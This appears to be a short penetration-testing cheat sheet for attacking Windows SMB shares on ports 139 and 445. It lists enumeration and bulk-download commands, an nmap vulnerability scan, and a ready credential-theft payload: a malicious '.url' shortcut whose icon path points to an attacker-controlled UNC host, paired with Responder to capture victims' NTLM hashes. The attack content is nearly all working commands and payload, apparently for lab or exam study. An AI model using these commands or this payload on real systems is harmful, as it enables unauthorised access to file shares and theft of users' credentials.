Port 139,445

smbclient -L \\\\$ip\\

enum4linux -a $ip

smbclient \\\\$ip\\homes -U info -c 'recurse;ls'

mget *

get file file

Windows UNC path resolution behavior exploit

put evil.url

[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=Flibertygibbit
IconFile=\\192.168.45.163\%USERNAME%.icon
IconIndex=1

sudo responder -I tun0 -wv

Scan for potential vuln

nmap -script=smb-vuln\* -p445 $ip